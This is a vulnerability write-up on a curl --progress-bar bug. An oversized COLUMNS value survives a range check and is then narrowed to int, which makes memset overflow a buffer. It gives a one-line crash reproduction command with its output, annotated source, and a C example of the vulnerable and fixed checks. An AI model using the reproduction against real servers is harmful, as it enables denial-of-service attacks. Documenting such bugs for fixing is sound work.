If an attacker can set environment variables, curl will always crash with a buffer overflow while downloading a file, provided the --progress-bar argument is set.
Just run the following command on a 64-bit Linux system (verified on Ubuntu 19.04); the variable can be set in a .profile configuration file instead...

```
env COLUMNS="9223372032559808515" curl "http://hubblesource.stsci.edu/sources/video/clips/details/images/hale_bopp_2.mpg" -o "./test.mpg"
```

```
23,0%*** buffer overflow detected ***: curl terminated
Aborted (core dumped)
```
Explanation of the bug
The progress-bar feature parses the COLUMNS environment variable. The source code checks that this value is above 20, but on 64-bit Linux systems, where long is 64 bits wide, the check is defeated by the narrowing cast from long to int that follows it:
```c
colp = curlx_getenv("COLUMNS");
long num = strtol(colp, &endptr, 10);
/* Our value of 9223372032559808515 fits in a 64-bit long and is > 20, so it passes. */
if((endptr != colp) && (endptr == colp + strlen(colp)) && (num > 20))
  /* BUG! The long is narrowed back to int: only the low 32 bits survive,
     and 9223372032559808515 becomes 3. */
  bar->width = (int)num;
```
Then on line 181 we have the buffer overflow:
```c
barwidth = bar->width - 7;     /* HERE we get 3 - 7 == -4 ... */
num = (int) (((double)barwidth) * frac);  /* ... so num is negative */
if(num > MAX_BARLENGTH)        /* the cap only guards the upper bound */
  num = MAX_BARLENGTH;
memset(line, '#', num);        /* negative num is converted to size_t: a huge
                                  length, so memset writes far past 'line' */
```
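To show the two defects side by side, here is an added stand-alone C example (not curl's source and not the project's fix): width_vulnerable reproduces the check as the page quotes it, width_fixed bounds the value before the cast, and bar_chars returns the signed count that would otherwise reach memset. DEFAULT_WIDTH, MAX_WIDTH and the MAX_BARLENGTH value are assumptions of this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_WIDTH 79    /* assumed fallback width for this example */
#define MAX_WIDTH     10000 /* upper bound chosen for this example */
#define MAX_BARLENGTH 256   /* name from the page; the value is assumed */
/* Faulty pattern: the range check runs on the long, then the value is
   narrowed to int; 9223372032559808515 passes (> 20) but its low 32 bits
   are 3, so with a 64-bit long the stored width is 3. */
int width_vulnerable(const char *colp)
{
    char *endptr;
    long num = strtol(colp, &endptr, 10);
    if((endptr != colp) && (endptr == colp + strlen(colp)) && (num > 20))
        return (int)num;  /* narrowing cast: no longer guaranteed > 20 */
    return DEFAULT_WIDTH;
}

/* Hardened: bound the value while it is still a long, so the int can
   only ever hold 21..MAX_WIDTH-1 and width - 7 stays positive. */
int width_fixed(const char *colp)
{
    char *endptr;
    long num = strtol(colp, &endptr, 10);
    if((endptr != colp) && (endptr == colp + strlen(colp)) &&
       (num > 20) && (num < MAX_WIDTH))
        return (int)num;
    return DEFAULT_WIDTH;
}

/* Count of '#' the bar would draw at fraction frac, kept signed so the
   caller can see the negative value memset would receive as a size_t. */
int bar_chars(int width, double frac)
{
    int barwidth = width - 7;                  /* 3 - 7 == -4 */
    int num = (int)(((double)barwidth) * frac);
    if(num > MAX_BARLENGTH)
        num = MAX_BARLENGTH;
    return num;
}

int main(void)
{
    const char *cols = "9223372032559808515";  /* value from the report */
    int w = width_vulnerable(cols), n = bar_chars(w, 0.5);
    printf("vulnerable: width=%d chars=%d as size_t=%zu\n", w, n, (size_t)n);
    printf("fixed: width=%d chars=%d\n", width_fixed(cols), bar_chars(width_fixed(cols), 0.5));
    return 0;
}
```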
If a server runs curl with the --progress-bar argument set and (intentionally or unintentionally) allows an attacker to set environment variables, the server can easily become the victim of a DoS attack.